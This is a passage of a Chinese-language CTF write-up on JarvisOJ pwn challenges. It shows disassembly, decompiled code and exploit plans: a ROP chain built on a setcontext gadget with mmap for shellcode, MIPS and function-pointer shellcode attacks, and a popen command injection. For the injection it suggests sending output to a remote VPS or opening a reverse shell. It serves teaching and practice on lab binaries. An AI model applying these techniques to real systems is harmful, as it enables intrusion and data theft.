0x7ffff781a000 pwndbg&gt; x/20i 0x7ffff781a000+0x44f05 0x7ffff785ef05 &lt;setcontext+53&gt;: mov rsp,QWORD PTR [rdi+0xa0] 0x7ffff785ef0c &lt;setcontext+60&gt;: mov rbx,QWORD PTR [rdi+0x80] 0x7ffff785ef13 &lt;setcontext+67&gt;: mov rbp,QWORD PTR [rdi+0x78] 0x7ffff785ef17 &lt;setcontext+71&gt;: mov r12,QWORD PTR [rdi+0x48] 0x7ffff785ef1b &lt;setcontext+75&gt;: mov r13,QWORD PTR [rdi+0x50] 0x7ffff785ef1f &lt;setcontext+79&gt;: mov r14,QWORD PTR [rdi+0x58] 0x7ffff785ef23 &lt;setcontext+83&gt;: mov r15,QWORD PTR [rdi+0x60] 0x7ffff785ef27 &lt;setcontext+87&gt;: mov rcx,QWORD PTR [rdi+0xa8] 0x7ffff785ef2e &lt;setcontext+94&gt;: push rcx 0x7ffff785ef2f &lt;setcontext+95&gt;: mov rsi,QWORD PTR [rdi+0x70] 0x7ffff785ef33 &lt;setcontext+99&gt;: mov rdx,QWORD PTR [rdi+0x88] 0x7ffff785ef3a &lt;setcontext+106&gt;: mov rcx,QWORD PTR [rdi+0x98] 0x7ffff785ef41 &lt;setcontext+113&gt;: mov r8,QWORD PTR [rdi+0x28] 0x7ffff785ef45 &lt;setcontext+117&gt;: mov r9,QWORD PTR [rdi+0x30] 0x7ffff785ef49 &lt;setcontext+121&gt;: mov rdi,QWORD PTR [rdi+0x68] 0x7ffff785ef4d &lt;setcontext+125&gt;: xor eax,eax 0x7ffff785ef4f &lt;setcontext+127&gt;: ret 0x7ffff785ef50 &lt;setcontext+128&gt;: mov rcx,QWORD PTR [rip+0x36ef11] # 0x7ffff7bcde68 0x7ffff785ef57 &lt;setcontext+135&gt;: neg eax 0x7ffff785ef59 &lt;setcontext+137&gt;: mov DWORD PTR fs:[rcx],eax </code></pre></td></tr></table> </div> </div><p>一段几乎能控制所有寄存器的 gadget ！前提是能控制 rdi，这个就很容易了，直接使用 <code>pop rdi; ret</code> 即可。</p> <p>因此我的使用 mmap 的思路是：</p> <ol> <li>第一次 rop 执行 <code>write(1, elf.got['write'], rdx)</code> 来 leak libc，然后返回 <code>_start</code></li> <li>第二次 rop <ul> <li>执行 <code>read(0, elf.bss() + 0x300, 0x400)</code>，把寄存器的值读取到 bss 段，方便后续控制</li> <li>通过 <code>pop rdi; ret</code> 控制 rdi 指向 bss 段的地址</li> <li>返回 <code>setcontext+95</code> 控制 6 个寄存器</li> <li>返回 <code>mmap</code>，根据设置的寄存器申请出 rwx 的空间</li> <li>返回 <code>_start</code></li> </ul> </li> <li>第三次 rop 执行 <code>read(0, 0x12345000, 0x400)</code> 把 shellcode 读到 0x12345000(我 mmap 出的空间)，然后返回到该地址即可。</li> </ol> <p><a href="https://github.com/bash-c/pwn_repo/blob/master/jarvisOJ_level5/exp_mmap.py">exploit here</a></p> <h2 id="add-300">Add (300)</h2> <p>一道 mips 的题目，环境的搭建同样可以参考我之前写过的一篇 <a href="http://m4x.fun/post/arm_pwn/">分析</a>。而IDA 的 hexray 对 mips 没有太好的支持，可以使用 <a href="https://www.pnfsoftware.com/jeb/mips">jeb-mips</a> 或者 <a href="https://github.com/avast-tl/retdec">retdec</a> 来反编译，但实际效果也只是能看，最准确的方法还是直接读汇编。</p> <p>先看输入的部分，输入遇到 <code>\n</code> 才会停止，因此存在栈溢出 <img src="http://ww1.sinaimg.cn/large/006AWYXBly1fvdqm86lp4j308h0bwmy2.jpg" alt=""></p> <p>同时程序中有一处打印栈上输入地址的</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span><span class="lnt">9 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-asm" data-lang="asm"><span class="nl">loc_400B5C:</span> <span class="nf">la</span> <span class="no">$t9</span><span class="p">,</span> <span class="no">printf</span> <span class="nf">la</span> <span class="no">$a0</span><span class="p">,</span> <span class="no">aYourInputWasP</span> <span class="c"># &#34;Your input was %p\n&#34; </span><span class="c"></span><span class="no">jalr</span> <span class="no">$t9</span> <span class="c">; printf </span><span class="c"></span><span class="no">move</span> <span class="no">$a1</span><span class="p">,</span> <span class="no">input</span> <span class="nf">lw</span> <span class="no">$gp</span><span class="p">,</span> <span class="mi">0x98</span><span class="err">+</span><span class="no">var_88</span><span class="p">(</span><span class="no">$sp</span><span class="p">)</span> <span class="nf">move</span> <span class="no">$v1</span><span class="p">,</span> <span class="no">input</span> <span class="nf">b</span> <span class="no">loc_400984</span> <span class="nf">li</span> <span class="no">$s2</span><span class="p">,</span> <span class="mi">0x80</span> </code></pre></td></tr></table> </div> </div><p>跳转过来的条件是 <code>strcmp(input, s4)</code> 相等</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-asm" data-lang="asm"><span class="nf">la</span> <span class="no">$t9</span><span class="p">,</span> <span class="no">strcmp</span> <span class="nf">move</span> <span class="no">$a0</span><span class="p">,</span> <span class="no">input</span> <span class="c"># s1 </span><span class="c"></span><span class="no">jalr</span> <span class="no">$t9</span> <span class="c">; strcmp </span><span class="c"></span><span class="no">move</span> <span class="no">$a1</span><span class="p">,</span> <span class="no">$s4</span> <span class="c"># s2 </span><span class="c"></span><span class="no">lw</span> <span class="no">$gp</span><span class="p">,</span> <span class="mi">0x98</span><span class="err">+</span><span class="no">var_88</span><span class="p">(</span><span class="no">$sp</span><span class="p">)</span> <span class="nf">beqz</span> <span class="no">$v0</span><span class="p">,</span> <span class="no">loc_400B5C</span> <span class="nf">move</span> <span class="no">$a0</span><span class="p">,</span> <span class="no">input</span> <span class="c"># s </span></code></pre></td></tr></table> </div> </div><p>再向上找 s4 是什么</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-asm" data-lang="asm"><span class="nf">la</span> <span class="no">$t9</span><span class="p">,</span> <span class="no">srand</span> <span class="nf">move</span> <span class="no">$at</span><span class="p">,</span> <span class="no">$at</span> <span class="nf">jalr</span> <span class="no">$t9</span> <span class="c">; srand </span><span class="c"></span><span class="no">li</span> <span class="no">$a0</span><span class="p">,</span> <span class="mi">0x123456</span> <span class="c"># seed </span><span class="c"></span><span class="no">lw</span> <span class="no">$gp</span><span class="p">,</span> <span class="mi">0x98</span><span class="err">+</span><span class="no">var_88</span><span class="p">(</span><span class="no">$sp</span><span class="p">)</span> <span class="c"># srand(0x123456) </span><span class="c"></span><span class="no">addiu</span> <span class="no">$s4</span><span class="p">,</span> <span class="no">$sp</span><span class="p">,</span> <span class="mi">0x98</span><span class="err">+</span><span class="no">challenge</span> <span class="nf">la</span> <span class="no">$t9</span><span class="p">,</span> <span class="no">rand</span> <span class="nf">move</span> <span class="no">$at</span><span class="p">,</span> <span class="no">$at</span> <span class="nf">jalr</span> <span class="no">$t9</span> <span class="c">; rand </span><span class="c"></span><span class="no">addiu</span> <span class="no">input</span><span class="p">,</span> <span class="no">$sp</span><span class="p">,</span> <span class="mi">0x98</span><span class="err">+</span><span class="no">buf</span> <span class="nf">lw</span> <span class="no">$gp</span><span class="p">,</span> <span class="mi">0x98</span><span class="err">+</span><span class="no">var_88</span><span class="p">(</span><span class="no">$sp</span><span class="p">)</span> <span class="nf">lui</span> <span class="no">$a1</span><span class="p">,</span> <span class="mi">0x40</span> <span class="nf">la</span> <span class="no">$t9</span><span class="p">,</span> <span class="no">sprintf</span> <span class="nf">la</span> <span class="no">$a1</span><span class="p">,</span> <span class="no">aD</span> <span class="c"># &#34;%d&#34; </span><span class="c"></span><span class="no">move</span> <span class="no">$a2</span><span class="p">,</span> <span class="no">$v0</span> <span class="nf">jalr</span> <span class="no">$t9</span> <span class="c">; sprintf # sprintf(s4, &#34;%d&#34;, rand()) </span><span class="c"></span><span class="no">move</span> <span class="no">$a0</span><span class="p">,</span> <span class="no">$s4</span> <span class="c"># s </span></code></pre></td></tr></table> </div> </div><p>大致流程是</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-C" data-lang="C"><span class="n">srand</span><span class="p">(</span><span class="mh">0x123456</span><span class="p">);</span> <span class="kt">int</span> <span class="n">tmp</span> <span class="o">=</span> <span class="n">rand</span><span class="p">();</span> <span class="n">sprintf</span><span class="p">(</span><span class="n">s4</span><span class="p">,</span> <span class="s">&#34;%d&#34;</span><span class="p">,</span> <span class="n">tmp</span><span class="p">);</span> </code></pre></td></tr></table> </div> </div><p>随机种子是固定的，也即是随机值固定，因此 s4 的值也就知道了，通过这个功能我们能得到栈上输入的地址，程序没有开 NX 保护，输入 shellcode，并返回到 shellcode 即可。</p> <p>通过调试可以快速确定覆盖返回地址所需的偏移量。</p> <p><a href="https://github.com/bash-c/pwn_repo/blob/master/jarvisOJ_add/solve.py">exploit here</a></p> <h2 id="61dctfcalcexe-300">[61dctf]calc.exe (300)</h2> <p>这道题没开 NX 保护，很大概率就是使用 shellcode 来 get shell 了。这个题目主要麻烦在代码量太大，还是 strip 后的 binary，看起来很是费力。</p> <p>但这种代码量大的题目一般漏洞都很明显（代码量又大漏洞又难找，那题还怎么做），仔细分析，程序中存在一个如下的结构体（不是完全正确，程序没有看完）</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-C" data-lang="C"><span class="k">struct</span> <span class="n">NODE</span> <span class="p">{</span> <span class="kt">char</span> <span class="o">*</span><span class="n">name</span><span class="p">;</span> <span class="kt">char</span> <span class="o">*</span><span class="n">type</span><span class="p">;</span> <span class="kt">void</span> <span class="p">(</span><span class="o">*</span><span class="n">method</span><span class="p">)();</span> <span class="kt">int</span> <span class="n">len</span><span class="p">;</span> <span class="p">}</span> </code></pre></td></tr></table> </div> </div><p>所有的变量和函数以这种结构体的形式存储，其中有一个很敏感的函数指针，如果能控制函数指针，就能控制 eip 了。</p> <p>再往下看，程序有一个 <code>var</code> 可以声明变量，命令格式为 <code>var variable = &quot;value&quot;</code></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-C" data-lang="C"> <span class="k">if</span> <span class="p">(</span> <span class="o">!</span><span class="n">strcmp</span><span class="p">(</span><span class="n">s1</span><span class="p">,</span> <span class="s">&#34;var&#34;</span><span class="p">)</span> <span class="p">)</span> <span class="p">{</span> <span class="n">argv1</span> <span class="o">=</span> <span class="n">strtok</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="s">&#34; &#34;</span><span class="p">);</span> <span class="n">argv2</span> <span class="o">=</span> <span class="n">strtok</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="s">&#34; &#34;</span><span class="p">);</span> <span class="k">if</span> <span class="p">(</span> <span class="o">!</span><span class="n">argv2</span> <span class="p">)</span> <span class="k">break</span><span class="p">;</span> <span class="k">if</span> <span class="p">(</span> <span class="n">argv2</span> <span class="o">&amp;&amp;</span> <span class="o">*</span><span class="n">argv2</span> <span class="o">==</span> <span class="sc">&#39;=&#39;</span> <span class="p">)</span> <span class="p">{</span> <span class="n">argv3</span> <span class="o">=</span> <span class="n">strtok</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="s">&#34; &#34;</span><span class="p">);</span> <span class="k">if</span> <span class="p">(</span> <span class="o">!</span><span class="n">argv3</span> <span class="p">)</span> <span class="p">{</span> <span class="n">puts</span><span class="p">(</span><span class="s">&#34;invalid syntax&#34;</span><span class="p">);</span> <span class="k">break</span><span class="p">;</span> <span class="p">}</span> <span class="k">if</span> <span class="p">(</span> <span class="o">*</span><span class="n">argv3</span> <span class="o">==</span> <span class="sc">&#39;&#34;&#39;</span> <span class="p">)</span> <span class="p">{</span> <span class="n">nptra</span> <span class="o">=</span> <span class="n">argv3</span> <span class="o">+</span> <span class="mi">1</span><span class="p">;</span> <span class="n">v26</span> <span class="o">=</span> <span class="n">strchr</span><span class="p">(</span><span class="n">nptra</span><span class="p">,</span> <span class="sc">&#39;&#34;&#39;</span><span class="p">);</span> <span class="k">if</span> <span class="p">(</span> <span class="n">v26</span> <span class="p">)</span> <span class="p">{</span> <span class="o">*</span><span class="n">v26</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">v3</span> <span class="o">=</span> <span class="n">set_str</span><span class="p">(</span><span class="n">argv1</span><span class="p">,</span> <span class="n">nptra</span><span class="p">);</span> <span class="n">store_into_list</span><span class="p">(</span><span class="n">g_list</span><span class="p">,</span> <span class="n">argv1</span><span class="p">,</span> <span class="p">(</span><span class="kt">int</span><span class="p">)</span><span class="n">v3</span><span class="p">);</span> <span class="p">}</span> <span class="p">}</span> </code></pre></td></tr></table> </div> </div><p>但 store_into_list() 函数寻址时是通过变量名之间的比较进行的，也即是即使 <code>var add = &quot;eval&quot;</code> 也是程序允许的，这样我们就可以控制函数指针了。因此直接把某个函数的 method 改成 shellcode 即可。</p> <p><a href="https://github.com/bash-c/pwn_repo/blob/master/jarvisOJ_calc.exe/solve.py">exploit here</a></p> <h2 id="guess-300">Guess (300)</h2> <p>这个题目也更像一个逆向题，好在程序没有 strip，看起来比较清楚。</p> <p>程序先建立了一个 socket，之后的输入输出均通过该 socket 进行。主要逻辑在 <code>is_flag_correct</code> 函数中，而漏洞也出在这里。</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-C" data-lang="C"> <span class="n">value1</span> <span class="o">=</span> <span class="n">bin_by_hex</span><span class="p">[</span><span class="n">flag_hex</span><span class="p">[</span><span class="mi">2</span> <span class="o">*</span> <span class="n">i</span><span class="p">]];</span> <span class="n">value2</span> <span class="o">=</span> <span class="n">bin_by_hex</span><span class="p">[</span><span class="n">flag_hex</span><span class="p">[</span><span class="mi">2</span> <span class="o">*</span> <span class="n">i</span> <span class="o">+</span> <span class="mi">1</span><span class="p">]];</span> </code></pre></td></tr></table> </div> </div><p>这里使用了下标寻址的方法，flag_hex 是我们的输入，类型是 char *，通过构造负数就可以寻址到 bin_by_hex 上方</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-asm" data-lang="asm"><span class="err">-0000000000000198</span> <span class="nf">flag_hex</span> <span class="no">dq</span> <span class="err">?</span> <span class="c">; offset </span><span class="c"></span><span class="p">-</span><span class="mi">0000000000000190</span> <span class="no">given_flag</span> <span class="no">db</span> <span class="mi">50</span> <span class="no">dup</span><span class="p">(</span><span class="err">?</span><span class="p">)</span> <span class="err">-000000000000015</span><span class="nf">E</span> <span class="no">db</span> <span class="err">?</span> <span class="c">; undefined </span><span class="c"></span><span class="p">-</span><span class="mi">000000000000015</span><span class="no">D</span> <span class="no">db</span> <span class="err">?</span> <span class="c">; undefined </span><span class="c"></span><span class="p">-</span><span class="mi">000000000000015</span><span class="no">C</span> <span class="no">db</span> <span class="err">?</span> <span class="c">; undefined </span><span class="c"></span><span class="p">-</span><span class="mi">000000000000015</span><span class="no">B</span> <span class="no">db</span> <span class="err">?</span> <span class="c">; undefined </span><span class="c"></span><span class="p">-</span><span class="mi">000000000000015</span><span class="no">A</span> <span class="no">db</span> <span class="err">?</span> <span class="c">; undefined </span><span class="c"></span><span class="p">-</span><span class="mi">0000000000000159</span> <span class="no">db</span> <span class="err">?</span> <span class="c">; undefined </span><span class="c"></span><span class="p">-</span><span class="mi">0000000000000158</span> <span class="no">db</span> <span class="err">?</span> <span class="c">; undefined </span><span class="c"></span><span class="p">-</span><span class="mi">0000000000000157</span> <span class="no">db</span> <span class="err">?</span> <span class="c">; undefined </span><span class="c"></span><span class="p">-</span><span class="mi">0000000000000156</span> <span class="no">db</span> <span class="err">?</span> <span class="c">; undefined </span><span class="c"></span><span class="p">-</span><span class="mi">0000000000000155</span> <span class="no">db</span> <span class="err">?</span> <span class="c">; undefined </span><span class="c"></span><span class="p">-</span><span class="mi">0000000000000154</span> <span class="no">db</span> <span class="err">?</span> <span class="c">; undefined </span><span class="c"></span><span class="p">-</span><span class="mi">0000000000000153</span> <span class="no">db</span> <span class="err">?</span> <span class="c">; undefined </span><span class="c"></span><span class="p">-</span><span class="mi">0000000000000152</span> <span class="no">db</span> <span class="err">?</span> <span class="c">; undefined </span><span class="c"></span><span class="p">-</span><span class="mi">0000000000000151</span> <span class="no">db</span> <span class="err">?</span> <span class="c">; undefined </span><span class="c"></span><span class="p">-</span><span class="mi">0000000000000150</span> <span class="no">flag</span> <span class="no">db</span> <span class="mi">50</span> <span class="no">dup</span><span class="p">(</span><span class="err">?</span><span class="p">)</span> <span class="err">-000000000000011</span><span class="nf">E</span> <span class="no">db</span> <span class="err">?</span> <span class="c">; undefined </span><span class="c"></span><span class="p">-</span><span class="mi">000000000000011</span><span class="no">D</span> <span class="no">db</span> <span class="err">?</span> <span class="c">; undefined </span><span class="c"></span><span class="p">-</span><span class="mi">000000000000011</span><span class="no">C</span> <span class="no">db</span> <span class="err">?</span> <span class="c">; undefined </span><span class="c"></span><span class="p">-</span><span class="mi">000000000000011</span><span class="no">B</span> <span class="no">db</span> <span class="err">?</span> <span class="c">; undefined </span><span class="c"></span><span class="p">-</span><span class="mi">000000000000011</span><span class="no">A</span> <span class="no">db</span> <span class="err">?</span> <span class="c">; undefined </span><span class="c"></span><span class="p">-</span><span class="mi">0000000000000119</span> <span class="no">db</span> <span class="err">?</span> <span class="c">; undefined </span><span class="c"></span><span class="p">-</span><span class="mi">0000000000000118</span> <span class="no">db</span> <span class="err">?</span> <span class="c">; undefined </span><span class="c"></span><span class="p">-</span><span class="mi">0000000000000117</span> <span class="no">db</span> <span class="err">?</span> <span class="c">; undefined </span><span class="c"></span><span class="p">-</span><span class="mi">0000000000000116</span> <span class="no">db</span> <span class="err">?</span> <span class="c">; undefined </span><span class="c"></span><span class="p">-</span><span class="mi">0000000000000115</span> <span class="no">db</span> <span class="err">?</span> <span class="c">; undefined </span><span class="c"></span><span class="p">-</span><span class="mi">0000000000000114</span> <span class="no">db</span> <span class="err">?</span> <span class="c">; undefined </span><span class="c"></span><span class="p">-</span><span class="mi">0000000000000113</span> <span class="no">db</span> <span class="err">?</span> <span class="c">; undefined </span><span class="c"></span><span class="p">-</span><span class="mi">0000000000000112</span> <span class="no">db</span> <span class="err">?</span> <span class="c">; undefined </span><span class="c"></span><span class="p">-</span><span class="mi">0000000000000111</span> <span class="no">db</span> <span class="err">?</span> <span class="c">; undefined </span><span class="c"></span><span class="p">-</span><span class="mi">0000000000000110</span> <span class="no">bin_by_hex</span> <span class="no">db</span> <span class="mi">256</span> <span class="no">dup</span><span class="p">(</span><span class="err">?</span><span class="p">)</span> <span class="err">-0000000000000010</span> <span class="nf">db</span> <span class="err">?</span> <span class="c">; undefined </span></code></pre></td></tr></table> </div> </div><p>而 flag 就在 bin_by_hex 上方，这样如果我们构造 <code>value1 = 0, value2 = flag[i]</code>，就可以覆盖 flag[i] 了，这样就可以通过逐位覆盖 flag，根据不同的回显来爆破了。</p> <p>王一航师傅对这道题目做过很详细的分析，<a href="https://www.jianshu.com/p/40f846d14450">传送门</a></p> <h2 id="http-350">HTTP (350)</h2> <p>这道题目也更像一个逆向，没有 pwn 常见的溢出等漏洞，而是直接可以命令执行</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-C" data-lang="C"><span class="kr">__int64</span> <span class="kr">__fastcall</span> <span class="nf">sub_40102F</span><span class="p">(</span><span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="n">a1</span><span class="p">,</span> <span class="kt">char</span> <span class="o">*</span><span class="n">a2</span><span class="p">,</span> <span class="kt">int</span> <span class="n">a3</span><span class="p">)</span> <span class="p">{</span> <span class="kt">char</span> <span class="o">*</span><span class="n">v3</span><span class="p">;</span> <span class="c1">// rbx </span><span class="c1"></span> <span class="kt">int</span> <span class="n">v5</span><span class="p">;</span> <span class="c1">// [rsp+Ch] [rbp-34h] </span><span class="c1"></span> <span class="n">FILE</span> <span class="o">*</span><span class="n">stream</span><span class="p">;</span> <span class="c1">// [rsp+20h] [rbp-20h] </span><span class="c1"></span> <span class="kt">int</span> <span class="n">i</span><span class="p">;</span> <span class="c1">// [rsp+2Ch] [rbp-14h] </span><span class="c1"></span> <span class="n">v5</span> <span class="o">=</span> <span class="n">a3</span><span class="p">;</span> <span class="n">stream</span> <span class="o">=</span> <span class="n">popen</span><span class="p">(</span><span class="n">a1</span><span class="p">,</span> <span class="s">&#34;r&#34;</span><span class="p">);</span> <span class="c1">// rce </span><span class="c1"></span> <span class="k">if</span> <span class="p">(</span> <span class="n">stream</span> <span class="p">)</span> <span class="p">{</span> <span class="k">for</span> <span class="p">(</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="p">;</span> <span class="o">++</span><span class="n">i</span> <span class="p">)</span> <span class="p">{</span> <span class="n">v3</span> <span class="o">=</span> <span class="o">&amp;</span><span class="n">a2</span><span class="p">[</span><span class="n">i</span><span class="p">];</span> <span class="o">*</span><span class="n">v3</span> <span class="o">=</span> <span class="n">fgetc</span><span class="p">(</span><span class="n">stream</span><span class="p">);</span> <span class="k">if</span> <span class="p">(</span> <span class="o">*</span><span class="n">v3</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span> <span class="o">||</span> <span class="n">v5</span> <span class="o">-</span> <span class="mi">1</span> <span class="o">&lt;=</span> <span class="n">i</span> <span class="p">)</span> <span class="k">break</span><span class="p">;</span> <span class="p">}</span> <span class="n">pclose</span><span class="p">(</span><span class="n">stream</span><span class="p">);</span> <span class="p">}</span> <span class="k">else</span> <span class="p">{</span> <span class="n">i</span> <span class="o">=</span> <span class="n">sprintf</span><span class="p">(</span><span class="n">a2</span><span class="p">,</span> <span class="s">&#34;error command line:%s </span><span class="se">\n</span><span class="s">&#34;</span><span class="p">,</span> <span class="n">a1</span><span class="p">);</span> <span class="p">}</span> <span class="n">a2</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="k">return</span> <span class="p">(</span><span class="kt">unsigned</span> <span class="kt">int</span><span class="p">)</span><span class="n">i</span><span class="p">;</span> <span class="p">}</span> </code></pre></td></tr></table> </div> </div><p>当然到这一步需要通过前边的各种验证</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-C" data-lang="C"><span class="kt">signed</span> <span class="kr">__int64</span> <span class="kr">__fastcall</span> <span class="nf">sub_400FAF</span><span class="p">(</span><span class="kr">__int64</span> <span class="n">a1</span><span class="p">)</span> <span class="p">{</span> <span class="kt">int</span> <span class="n">v2</span><span class="p">;</span> <span class="c1">// [rsp+1Ch] [rbp-14h] </span><span class="c1"></span> <span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="n">s</span><span class="p">;</span> <span class="c1">// [rsp+20h] [rbp-10h] </span><span class="c1"></span> <span class="kt">int</span> <span class="n">i</span><span class="p">;</span> <span class="c1">// [rsp+2Ch] [rbp-4h] </span><span class="c1"></span> <span class="n">s</span> <span class="o">=</span> <span class="n">encrypt</span><span class="p">(</span><span class="n">off_601CE8</span><span class="p">);</span> <span class="n">v2</span> <span class="o">=</span> <span class="n">strlen</span><span class="p">(</span><span class="n">s</span><span class="p">);</span> <span class="k">for</span> <span class="p">(</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">v2</span><span class="p">;</span> <span class="o">++</span><span class="n">i</span> <span class="p">)</span> <span class="p">{</span> <span class="k">if</span> <span class="p">(</span> <span class="p">(</span><span class="n">i</span> <span class="o">^</span> <span class="o">*</span><span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="p">)(</span><span class="n">i</span> <span class="o">+</span> <span class="n">a1</span><span class="p">))</span> <span class="o">!=</span> <span class="n">s</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="p">)</span> <span class="k">return</span> <span class="mi">0LL</span><span class="p">;</span> <span class="p">}</span> <span class="k">return</span> <span class="mi">1LL</span><span class="p">;</span> <span class="p">}</span> </code></pre></td></tr></table> </div> </div><p>encrypt 函数逆到一半发现都是固定值，直接可以把结果调试出来。按照题目的要求构造报文格式，就可以任意命令执行了。</p> <p>但关键是执行什么命令，这道题目是通过 socket 进行通信的，因此直接 <code>cat flag</code> 不会有回显，可以通过管道将结果发送到远程 vps 上，在 vps 上监听到 flag，或者可以直接建立一个 reverse shell。</p> <p>原理可以看我写的几篇分析 <a href="http://m4x.fun/post/play-with-file-descriptor-1/">fd</a> 的文章。</p> <p><a href="https://github.com/bash-c/pwn_repo/blob/master/jarvisOJ_HTTP/solve.py">expoit here</a></p> <h2 id="guestbook2-400">Guestbook2 (400)</h2> <p>Guessbook2，[XMAN]level6，[XMAN]level6_x64 三道题目几乎一样，放到一块讲。</p> <p>程序中存在如下的结构体</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-c" data-lang="c"><span class="k">struct</span> <span class="n">noteList</span> <span class="p">{</span> <span class="kt">int</span> <span class="n">all</span><span class="p">;</span> <span class="kt">int</span> 